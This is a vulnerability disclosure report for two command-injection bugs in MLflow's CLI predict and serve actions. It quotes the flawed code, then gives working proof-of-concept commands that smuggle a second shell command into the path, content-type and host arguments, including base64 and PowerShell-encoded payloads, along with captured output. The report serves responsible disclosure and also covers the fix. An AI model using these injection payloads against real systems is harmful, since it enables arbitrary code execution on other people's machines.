Multiple command injections in `mlflow models` CLI action in mlflow/mlflow

Valid

Reported on

Apr 30th 2023


Description

The mlflow CLI executable is vulnerable to command injection attacks in the mlflow models predict and mlflow models serve actions. These actions are defined in mlflow/models/cli.py and rely on the vulnerable predict and serve methods of a dynamically resolved PyFuncBackend instance, defined in mlflow/pyfunc/backend.py.

[Bug 1] mlflow models predict command injection

The code of the PyFuncBackend.predict method can be seen below:

def predict(self, model_uri, input_path, output_path, content_type):
    """
    Generate predictions using generic python model saved with MLflow. The expected format of
    the input JSON is the Mlflow scoring format.
    Return the prediction results as a JSON.
    """
    local_path = _download_artifact_from_uri(model_uri)
    # NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
    # platform compatibility.
    local_uri = path_to_local_file_uri(local_path)

    if self._env_manager != _EnvManager.LOCAL:
        command = (
            'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
            "model_uri={model_uri}, "
            "input_path={input_path}, "
            "output_path={output_path}, "
            "content_type={content_type})"
            '"'
        ).format(
            model_uri=repr(local_uri),
            input_path=repr(input_path),
            output_path=repr(output_path),
            content_type=repr(content_type),
        )
        return self.prepare_env(local_path).execute(command)
    else:
        scoring_server._predict(local_uri, input_path, output_path, content_type)

The application dynamically constructs a shell command by injecting the user input into the predefined placeholders and passes it to the mlflow.utils.Environment.execute method, which runs the newly created console command.

The application uses the built-in Python function repr to add quotes around the user input. However, repr does not escape double quotes, so an attacker can inject a double quote into the CLI parameters to break out of the python -c "" argument, as can be seen in the example below:

>>> local_uri='LOCAL_URI'
>>> input_path='INPUT_PATH'
>>> output_path='OUTPUT_PATH'
>>> content_type='injection poc"; we are free now; echo "escape the rest'
>>> command = (
...     'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
...     "model_uri={model_uri}, "
...     "input_path={input_path}, "
...     "output_path={output_path}, "
...     "content_type={content_type})"
...     '"'
... ).format(
...     model_uri=repr(local_uri),
...     input_path=repr(input_path),
...     output_path=repr(output_path),
...     content_type=repr(content_type),
... )
>>> print(command)
python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='LOCAL_URI', input_path='INPUT_PATH', output_path='OUTPUT_PATH', content_type='injection poc"; we are free now; echo "escape the rest')"

Thus, it is possible to inject arbitrary commands into the parameters of the mlflow models predict action and achieve unintended code execution.
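For reference, the injection works only because the value is interpolated into a string that a shell later parses. A minimal mitigation sketch (hypothetical, not MLflow's actual fix) is to quote the entire python -c payload with shlex.quote before it reaches the shell:

```python
# Hypothetical mitigation sketch, NOT MLflow's actual fix: quoting the whole
# "python -c" payload with shlex.quote makes the injected double quote inert.
# POSIX shells only; shlex.quote is not valid quoting for cmd.exe.
import shlex
import subprocess
import sys

content_type = 'poc"; id; echo "'  # attacker-controlled value
# Stand-in for the _predict(...) call that MLflow builds:
inner = f"print('content_type =', {content_type!r})"
command = f"{shlex.quote(sys.executable)} -c {shlex.quote(inner)}"

# The shell now receives the payload as a single argument; no second
# command is executed, the value is merely printed back.
result = subprocess.run(command, shell=True, capture_output=True, text=True)
print(result.stdout, end="")
```

With quoting applied, the output is just the literal payload text rather than the result of an injected id command.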

[Bug 2] mlflow models serve command injection

The code of the vulnerable PyFuncBackend.serve method can be seen below.

def serve(
        self,
        model_uri,
        port,
        host,
        timeout,
        enable_mlserver,
        synchronous=True,
        stdout=None,
        stderr=None,
    ):  # pylint: disable=W0221
        """
        Serve pyfunc model locally.
        """
        local_path = _download_artifact_from_uri(model_uri)

        server_implementation = mlserver if enable_mlserver else scoring_server
        command, command_env = server_implementation.get_cmd(
            local_path, port, host, timeout, self._nworkers
        )

        ...
        if self._env_manager != _EnvManager.LOCAL:
            return self.prepare_env(local_path).execute(
                command,
                command_env,
                stdout=stdout,
                stderr=stderr,
                preexec_fn=setup_sigterm_on_parent_death,
                synchronous=synchronous,
            )
        else:
            _logger.info("=== Running command '%s'", command)

            if os.name != "nt":
                command = ["bash", "-c", command]

            child_proc = subprocess.Popen(
                command,
                env=command_env,
                preexec_fn=setup_sigterm_on_parent_death,
                stdout=stdout,
                stderr=stderr,
            )
            ...

The method above uses the get_cmd function, defined in mlflow/pyfunc/scoring_server/__init__.py, which formats user input directly into a command string:

def get_cmd(
    model_uri: str, port: int = None, host: int = None, timeout: int = None, nworkers: int = None
) -> Tuple[str, Dict[str, str]]:
    local_uri = path_to_local_file_uri(model_uri)
    timeout = timeout or MLFLOW_SCORING_SERVER_REQUEST_TIMEOUT.get()
    # NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
    # platform compatibility.
    if os.name != "nt":
        args = [f"--timeout={timeout}"]
        if port and host:
            args.append(f"-b {host}:{port}")
        elif host:
            args.append(f"-b {host}")

        if nworkers:
            args.append(f"-w {nworkers}")

        command = (
            f"gunicorn {' '.join(args)} ${{GUNICORN_CMD_ARGS}}"
            " -- mlflow.pyfunc.scoring_server.wsgi:app"
        )
    else:
        args = []
        if host:
            args.append(f"--host={host}")

        if port:
            args.append(f"--port={port}")

        command = (
            f"waitress-serve {' '.join(args)} "
            "--ident=mlflow mlflow.pyfunc.scoring_server.wsgi:app"
        )

    command_env = os.environ.copy()
    command_env[_SERVER_MODEL_PATH] = local_uri

    return command, command_env
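To illustrate, the Linux branch of get_cmd interpolates the host value into the gunicorn command string with no quoting at all, so a host containing & simply splits the command. A minimal standalone reproduction of just the formatting logic (variable names mirror the original; the host value is the Bug 2 payload):

```python
# Standalone reproduction of the string formatting in get_cmd (Linux branch).
timeout = 60
host = "localhost & id & localhost"  # attacker-controlled --host value
port = 80
nworkers = 1

args = [f"--timeout={timeout}"]
if port and host:
    args.append(f"-b {host}:{port}")
if nworkers:
    args.append(f"-w {nworkers}")

command = (
    f"gunicorn {' '.join(args)} ${{GUNICORN_CMD_ARGS}}"
    " -- mlflow.pyfunc.scoring_server.wsgi:app"
)
print(command)
# When this string is later run via "bash -c", the unquoted "&" terminates
# the gunicorn invocation and runs "id" as a separate background command.
```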

Proof of Concept

Install required dependencies

Install the latest version of mlflow

pip install mlflow

Install pyenv or conda (a prerequisite for the mlflow models predict command to work with non-local environments).

Pyenv installation guide

OR

Conda installation guide

Setup mlflow environment

Clone the mlflow repository into a local directory

git clone https://github.com/mlflow/mlflow

Run one of the example mlflow scripts that saves a model, e.g. examples/sklearn_logistic_regression/train.py, to populate the mlruns directory:

cd mlflow/examples/sklearn_logistic_regression
python train.py

List the files inside the mlruns/0/ directory to obtain a valid run ID:

ls -l mlruns/0/

total 8
drwxrwxr-x 6 ubuntu ubuntu 4096 Apr 29 19:28 330068e1dfcf43cb8f1cd0e86038d781 # use this id
-rw-rw-r-- 1 ubuntu ubuntu  227 Apr 29 19:28 meta.yaml

[Bug 1] Exploitation

Insert the payload below into the input path (-i), output path (-o), or content type (-t) parameter:

"; YOUR COMMAND HERE; echo "

For example:

mlflow models predict -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -i 'test"; id; echo "' -o test
2023/04/29 19:48:00 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; id; echo "\', output_path=\'test\', content_type=\'json\')"']'
  File "<string>", line 1
    from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
                                                                                                                                                                                                                                   ^
SyntaxError: unterminated string literal (detected at line 1)
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')

If you want to run more advanced commands that themselves require quotes, you may want to encode your input beforehand.

Injecting advanced payloads for Linux & virtualenv env manager:

# example of encoding a payload that echoes "hello from mlflow rce!" and runs "id"
echo 'echo "hello from mlflow rce!"; id;' | base64

# encoded payload
ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo=

# poc
$ mlflow models predict -m 'runs:/RUN_ID/model/' -i 'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "' -o test
2023/04/29 20:09:37 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "\', output_path=\'test\', content_type=\'json\')"']'
  File "<string>", line 1
    from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
                                                                                                                                                                                                                                   ^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce!
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')

Injecting advanced payloads for Windows & conda env manager:

# example of encoding a payload that echoes "hello from mlflow rce" and runs "whoami /all"
https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')&input=ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlIjsgd2hvYW1pIC9hbGw

# encoded payload 
ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA==

# poc
(base) C:\Temp\mlflow\examples\sklearn_logistic_regression>mlflow models predict --env-manager conda -m mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model -i "test"" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo "" " -o test -t json
C:\Users\Strawberry\miniconda3\lib\site-packages\click\core.py:2322: UserWarning: Use of conda is discouraged. If you use it, please ensure that your use of conda complies with Anaconda's terms of service (https://legal.anaconda.com/policies/en/?name=terms-of-service). virtualenv is the recommended tool for environment reproducibility. To suppress this warning, set the MLFLOW_DISABLE_ENV_MANAGER_CONDA_WARNING (default: False, type: bool) environment variable to 'TRUE'.
  value = self.callback(ctx, self, value)
2023/04/30 02:32:40 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 02:32:43 INFO mlflow.utils.conda: Conda environment mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e already exists.
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c ""']'
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model\', input_path=\'test" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo " \', output_path=\'test\', content_type=\'json\')"']'
  File "<string>", line 1
    "from
    ^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce

USER INFORMATION
----------------

User Name                  SID
========================== =============================================
desktop-0gd1eqg\strawberry S-1-5-21-2872549777-3506415077-326829181-1001

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID                                           Attributes
============================================================= ================ ============================================= ==================================================
Everyone                                                      Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114                                     Group used for deny only
DESKTOP-0GD1EQG\docker-users                                  Alias            S-1-5-21-2872549777-3506415077-326829181-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544                                  Group used for deny only
BUILTIN\Hyper-V Administrators                                Alias            S-1-5-32-578                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users                                 Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

\" ', output_path='test', content_type='json')\"

[Bug 2] Exploitation

Insert the command injection payload into the -h (--host) parameter:

mlflow models serve -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -p '80' -h 'localhost & id & localhost'

2023/04/30 11:51:07 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && exec gunicorn --timeout=60 -b localhost & id & localhost:80 -w 1 ${GUNICORN_CMD_ARGS} -- mlflow.pyfunc.scoring_server.wsgi:app']'
...
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
...

Impact

An attacker is able to execute arbitrary OS commands by injecting malicious input into the CLI arguments of the mlflow models predict and mlflow models serve actions of the mlflow executable. This vulnerability can be leveraged to gain a foothold on a vulnerable machine, or to attempt local privilege escalation if only a restricted way of invoking the mlflow executable is available.

Occurrences

Code of the vulnerable PyFuncBackend.serve method

Code of the vulnerable PyFuncBackend.predict method

We are processing your report and will contact the mlflow team within 24 hours. 5 months ago
Maksym Vatsyk
5 months ago

Researcher


Upon further investigation, it seems that numerous methods of the PyFuncBackend and RFuncBackend classes are vulnerable to similar command injections. I will try to write them up ASAP and group them in this report.

Maksym Vatsyk modified the report
5 months ago
Maksym Vatsyk
5 months ago

Researcher


Updated the description to include the second discovered command injection in PyFuncBackend. RFuncBackend is still in progress

We have contacted a member of the mlflow team and are waiting to hear back 5 months ago
Maksym Vatsyk
4 months ago

Researcher


Was unable to verify the RFuncBackend injections.

Serena Ruan validated this vulnerability 2 months ago
Maksym Vatsyk has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Maksym Vatsyk
2 months ago

Researcher


@admin, can we add a co-author to this report? https://huntr.dev/users/nashkersk/

Maksym Vatsyk
2 months ago

Researcher


Also, this vulnerability was fixed in https://github.com/mlflow/mlflow/pull/9053 by @serena-ruan

Serena Ruan marked this as fixed in 2.6.0 with commit 6dde93 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Aug 1st 2023
backend.py#L162 has been validated
backend.py#L133 has been validated
Serena Ruan published this vulnerability 2 months ago